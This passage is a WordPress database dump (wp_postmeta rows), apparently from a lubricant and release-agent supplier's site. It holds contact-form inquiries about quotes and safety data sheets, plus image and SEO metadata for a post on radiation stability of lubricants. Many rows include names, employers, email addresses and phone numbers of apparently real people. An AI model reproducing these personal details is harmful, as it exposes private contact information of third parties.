INSERT INTO `wp_postmeta` VALUES (37470, 4213, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37471, 4213, '_sub_id', '4213'); 
INSERT INTO `wp_postmeta` VALUES (37472, 4214, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37473, 4214, '_seq_num', '288'); 
INSERT INTO `wp_postmeta` VALUES (37474, 4214, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37475, 4214, '_field_12', 'John Henderson'); 
INSERT INTO `wp_postmeta` VALUES (37476, 4214, '_field_13', 'Washington Glass School'); 
INSERT INTO `wp_postmeta` VALUES (37477, 4214, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37478, 4214, '_field_14', 'glassgalleries@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37479, 4214, '_field_15', '(443) 802-0559'); 
INSERT INTO `wp_postmeta` VALUES (37480, 4214, '_field_16', 'Boron Nitrade: Extra High Temperature Release Agent/Dry Lubricant (up to 850 to 1562F Degrees)\r\nE0201A'); 
INSERT INTO `wp_postmeta` VALUES (37481, 4214, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37482, 4214, '_sub_id', '4214'); 
INSERT INTO `wp_postmeta` VALUES (37483, 4215, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37484, 4215, '_seq_num', '639'); 
INSERT INTO `wp_postmeta` VALUES (37485, 4215, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37486, 4215, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37487, 4215, '_field_1', 'Linda Graven'); 
INSERT INTO `wp_postmeta` VALUES (37488, 4215, '_field_10', 'Gunze Electronics USA'); 
INSERT INTO `wp_postmeta` VALUES (37489, 4215, '_field_2', 'lgraven@gunzeusa.com'); 
INSERT INTO `wp_postmeta` VALUES (37490, 4215, '_field_8', '(151) 299-0340'); 
INSERT INTO `wp_postmeta` VALUES (37491, 4215, '_field_3', 'I am conducting our yearly MSDS/SDS document review. I need to know if the documents we have on file are current.\r\n\r\nEpoxy 907 Two Part Adhesive Revision date: January 2015.\r\n\r\nPlease let me know if this is current. If not please send me the current one(s).\r\nThank you,\r\nLinda Graven\r\nDocument Control\r\nGunze Electronic USA'); 
INSERT INTO `wp_postmeta` VALUES (37492, 4215, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37493, 4215, '_sub_id', '4215'); 
INSERT INTO `wp_postmeta` VALUES (37494, 4216, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37495, 4216, '_seq_num', '289'); 
INSERT INTO `wp_postmeta` VALUES (37496, 4216, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37497, 4216, '_field_12', 'David Hoydal'); 
INSERT INTO `wp_postmeta` VALUES (37498, 4216, '_field_13', 'Bottle Rocket, LLC'); 
INSERT INTO `wp_postmeta` VALUES (37499, 4216, '_field_18', '510-291-8200'); 
INSERT INTO `wp_postmeta` VALUES (37500, 4216, '_field_14', 'david.hoydal@btlrocket.com'); 
INSERT INTO `wp_postmeta` VALUES (37501, 4216, '_field_15', '(510) 291-8200'); 
INSERT INTO `wp_postmeta` VALUES (37502, 4216, '_field_16', 'Hello, I am looking for a replacement grease for our current grease. We have a large Printing Press that the mfg. currently specs out Omega 77 grease. It is an amazing type of grease, but difficult to find in the US (can only get through Press mfg&#039;s, US office - they are a European co.). We purchase cartridges for lubricating the press via a grease gun. Do you have an equivalent for the Omega 77 grease you would recommend? And if so, could we get a sample? And what would be the cost? Thanks so much, \r\n\r\nDavid Hoydal\r\nVP Operations\r\nBottle Rocket, LLC\r\nOakland, CA 94606\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37503, 4216, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37504, 4216, '_sub_id', '4216'); 
INSERT INTO `wp_postmeta` VALUES (37505, 4217, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37506, 4217, '_seq_num', '640'); 
INSERT INTO `wp_postmeta` VALUES (37507, 4217, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37508, 4217, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37509, 4217, '_field_1', 'Christopher Zielke'); 
INSERT INTO `wp_postmeta` VALUES (37510, 4217, '_field_10', 'ARRIS'); 
INSERT INTO `wp_postmeta` VALUES (37511, 4217, '_field_2', 'chris.zielke@arris.com'); 
INSERT INTO `wp_postmeta` VALUES (37512, 4217, '_field_8', '(408) 627-9467'); 
INSERT INTO `wp_postmeta` VALUES (37513, 4217, '_field_3', 'Where can I purchase some engineering quantity of your MS-460H?'); 
INSERT INTO `wp_postmeta` VALUES (37514, 4217, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37515, 4217, '_sub_id', '4217'); 
INSERT INTO `wp_postmeta` VALUES (37516, 4218, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37517, 4218, '_seq_num', '641'); 
INSERT INTO `wp_postmeta` VALUES (37518, 4218, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37519, 4218, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37520, 4218, '_field_1', 'Alisa Wilson'); 
INSERT INTO `wp_postmeta` VALUES (37521, 4218, '_field_10', 'Loma Linda University School of Dentistry'); 
INSERT INTO `wp_postmeta` VALUES (37522, 4218, '_field_2', 'awilson@llu.edu'); 
INSERT INTO `wp_postmeta` VALUES (37523, 4218, '_field_8', '(909) 558-4494'); 
INSERT INTO `wp_postmeta` VALUES (37524, 4218, '_field_3', 'Hello,\r\n\r\nI am looking for the SDS and have been unsuccessful.\r\nWould you point me in the right direction?\r\n \r\n1.  TFE Release Agent Drying Lubricant MS-122N/CO2\r\n\r\nThank you,\r\n\r\nAlisa Wilson'); 
INSERT INTO `wp_postmeta` VALUES (37525, 4218, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37526, 4218, '_sub_id', '4218'); 
INSERT INTO `wp_postmeta` VALUES (37527, 4219, '_edit_lock', '1494958674:2'); 
INSERT INTO `wp_postmeta` VALUES (37528, 4219, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (37529, 4221, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37530, 4221, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1117;s:6:"height";i:404;s:4:"file";s:43:"2017/05/Radiation-Stability-Lubricant-1.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-800x289.jpg";s:5:"width";i:800;s:6:"height";i:289;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-768x278.jpg";s:5:"width";i:768;s:6:"height";i:278;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-1-510x404.jpg";s:5:"width";i:510;s:6:"height";i:404;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"17";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37531, 4222, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37532, 4222, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1117;s:6:"height";i:404;s:4:"file";s:43:"2017/05/Radiation-Stability-Lubricant-2.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-800x289.jpg";s:5:"width";i:800;s:6:"height";i:289;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-768x278.jpg";s:5:"width";i:768;s:6:"height";i:278;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-2-510x404.jpg";s:5:"width";i:510;s:6:"height";i:404;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"19";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37533, 4223, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-2-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37534, 4223, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1117;s:6:"height";i:404;s:4:"file";s:45:"2017/05/Radiation-Stability-Lubricant-2-1.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-800x289.jpg";s:5:"width";i:800;s:6:"height";i:289;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-768x278.jpg";s:5:"width";i:768;s:6:"height";i:278;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"Radiation-Stability-Lubricant-2-1-510x404.jpg";s:5:"width";i:510;s:6:"height";i:404;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"19";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37535, 4224, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37536, 4224, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1107;s:6:"height";i:200;s:4:"file";s:43:"2017/05/Radiation-Stability-Lubricant-3.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-340x200.jpg";s:5:"width";i:340;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-800x145.jpg";s:5:"width";i:800;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-768x139.jpg";s:5:"width";i:768;s:6:"height";i:139;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-250x200.jpg";s:5:"width";i:250;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-225x200.jpg";s:5:"width";i:225;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-3-510x200.jpg";s:5:"width";i:510;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"25";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37537, 4225, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-5.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37538, 4225, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1109;s:6:"height";i:443;s:4:"file";s:43:"2017/05/Radiation-Stability-Lubricant-5.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-800x320.jpg";s:5:"width";i:800;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-768x307.jpg";s:5:"width";i:768;s:6:"height";i:307;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-5-510x443.jpg";s:5:"width";i:510;s:6:"height";i:443;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"15";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37539, 4226, '_wp_attached_file', '2017/05/Radiation-Stability-Lubricant-6.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37540, 4226, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:538;s:6:"height";i:169;s:4:"file";s:43:"2017/05/Radiation-Stability-Lubricant-6.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-6-340x169.jpg";s:5:"width";i:340;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-6-250x169.jpg";s:5:"width";i:250;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-6-200x169.jpg";s:5:"width";i:200;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-6-225x169.jpg";s:5:"width";i:225;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"Radiation-Stability-Lubricant-6-510x169.jpg";s:5:"width";i:510;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"79";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37541, 4227, '_wp_attached_file', '2017/05/shutterstock_568641832.jpg'); 
INSERT INTO `wp_postmeta` VALUES (37542, 4227, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:584;s:4:"file";s:34:"2017/05/shutterstock_568641832.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_568641832-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_568641832-800x467.jpg";s:5:"width";i:800;s:6:"height";i:467;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_568641832-768x449.jpg";s:5:"width";i:768;s:6:"height";i:449;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_568641832-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_568641832-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_568641832-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_568641832-510x584.jpg";s:5:"width";i:510;s:6:"height";i:584;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (37543, 4219, '_thumbnail_id', '4227'); 
INSERT INTO `wp_postmeta` VALUES (37545, 4219, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (37546, 4219, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (37547, 4219, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (37548, 4219, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (37549, 4219, '_yoast_wpseo_focuskw_text_input', 'Radiation Stability'); 
INSERT INTO `wp_postmeta` VALUES (37550, 4219, '_yoast_wpseo_focuskw', 'Radiation Stability'); 
INSERT INTO `wp_postmeta` VALUES (37551, 4219, '_yoast_wpseo_title', 'Radiation Stability of Krytox™ Lubricants and Fluoroguard™ Polymer Additives'); 
INSERT INTO `wp_postmeta` VALUES (37552, 4219, '_yoast_wpseo_metadesc', 'Radiation stability of these fluoropolymers can result in de-polymerization to volatile or, at least, lower molecular weight fragments.'); 
INSERT INTO `wp_postmeta` VALUES (37553, 4219, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (37554, 4219, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (37555, 4219, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (37556, 4229, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37557, 4229, '_seq_num', '642'); 
INSERT INTO `wp_postmeta` VALUES (37558, 4229, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37559, 4229, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37560, 4229, '_field_1', 'Eric Avalos'); 
INSERT INTO `wp_postmeta` VALUES (37561, 4229, '_field_10', 'LLNL'); 
INSERT INTO `wp_postmeta` VALUES (37562, 4229, '_field_2', 'avalos8@llnl.gov'); 
INSERT INTO `wp_postmeta` VALUES (37563, 4229, '_field_8', '(925) 423-0508'); 
INSERT INTO `wp_postmeta` VALUES (37564, 4229, '_field_3', 'Could I please get a quote for 4 boxes of MS-122AD(PTFE Release Agent/Dry Lubricant)'); 
INSERT INTO `wp_postmeta` VALUES (37565, 4229, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37566, 4229, '_sub_id', '4229'); 
INSERT INTO `wp_postmeta` VALUES (37567, 4230, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37568, 4230, '_seq_num', '643'); 
INSERT INTO `wp_postmeta` VALUES (37569, 4230, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37570, 4230, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37571, 4230, '_field_1', 'Gangadher '); 
INSERT INTO `wp_postmeta` VALUES (37572, 4230, '_field_10', 'ADI Electronics Manufacturing Technologies Pvt Ltd '); 
INSERT INTO `wp_postmeta` VALUES (37573, 4230, '_field_2', 'gangadher@adi-emt.com'); 
INSERT INTO `wp_postmeta` VALUES (37574, 4230, '_field_8', '(990) 005-2875'); 
INSERT INTO `wp_postmeta` VALUES (37575, 4230, '_field_3', 'Hi, \r\nPls send quotation for MS-462C or MS-462H .\r\nQty : 5ltr'); 
INSERT INTO `wp_postmeta` VALUES (37576, 4230, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37577, 4230, '_sub_id', '4230'); 
INSERT INTO `wp_postmeta` VALUES (37578, 4231, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37579, 4231, '_seq_num', '644'); 
INSERT INTO `wp_postmeta` VALUES (37580, 4231, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37581, 4231, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37582, 4231, '_field_1', 'Helen Bergstrom'); 
INSERT INTO `wp_postmeta` VALUES (37583, 4231, '_field_10', 'Saint-Gobain'); 
INSERT INTO `wp_postmeta` VALUES (37584, 4231, '_field_2', 'helen.bergstrom@saint-gobain.com'); 
INSERT INTO `wp_postmeta` VALUES (37585, 4231, '_field_8', '(508) 351-7172'); 
INSERT INTO `wp_postmeta` VALUES (37586, 4231, '_field_3', 'I was wondering if you offer any FDA compliant release agents for moderate temperatures (~300C) such as the fluoropolymer-based release agents of the BN-based release agents?\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37587, 4231, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37588, 4231, '_sub_id', '4231'); 
INSERT INTO `wp_postmeta` VALUES (37589, 4232, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37590, 4232, '_seq_num', '645'); 
INSERT INTO `wp_postmeta` VALUES (37591, 4232, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37592, 4232, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37593, 4232, '_field_1', 'Roy Thomas'); 
INSERT INTO `wp_postmeta` VALUES (37594, 4232, '_field_10', 'MSDSonline'); 
INSERT INTO `wp_postmeta` VALUES (37595, 4232, '_field_2', 'rthomas@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (37596, 4232, '_field_8', '9145748035'); 
INSERT INTO `wp_postmeta` VALUES (37597, 4232, '_field_3', 'Subject: Request for GHS FORMAT/ANSI-OSHA compliant [M]SDS (Batch B4710)\r\n\r\nHello,\r\n\r\nI am looking to obtain the latest [M]SDS on behalf of a mutual client &quot;Fox Cable Network Services LLC&quot; for the following product: \r\n\r\n1) Product Name: MS-930/CO2 Safezone Contact Re-Nu\r\n   Product Code: Not Available\r\n   Existing Revision Date: 11/1/2009\r\n   Language: English\r\n\r\n&quot;Fox Cable Network Services LLC&quot; is a US client and would prefer an GHS FORMAT/ANSI-OSHA compliant [M]SDS if available.\r\n If not, we gladly accept the regulatory format your [M]SDS’s come in.\r\n\r\nWe could not locate the [M]SDS on your website. Could you please confirm if these are the latest versions of [M]SDS’s for this product?\r\n\r\nIf a newer version of the above [M]SDS is available, could you please email the latest [M]SDS in pdf format to rthomas@ehs.com or fax it to 866-379-6189 , and if you could mention our Reference Number B4710 in the subject line that would be appreciated.\r\n\r\n If the product is not hazardous and does not require [M]SDS, could you please email us an Exempt Letter indicating the same? \r\n\r\n For your records please see the attached authorization letter from &quot;Fox Cable Network Services LLC&quot;\r\n\r\nPlease feel free to contact us if you require additional information.\r\n\r\n Thank you for your time.\r\n\r\nRoy Thomas.'); 
INSERT INTO `wp_postmeta` VALUES (37598, 4232, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37599, 4232, '_sub_id', '4232'); 
INSERT INTO `wp_postmeta` VALUES (37600, 4233, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37601, 4233, '_seq_num', '646'); 
INSERT INTO `wp_postmeta` VALUES (37602, 4233, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37603, 4233, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37604, 4233, '_field_1', 'Calin  Ignat'); 
INSERT INTO `wp_postmeta` VALUES (37605, 4233, '_field_10', 'GRANIT PIESE SRL'); 
INSERT INTO `wp_postmeta` VALUES (37606, 4233, '_field_2', 'granit.piese@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37607, 4233, '_field_8', ''); 
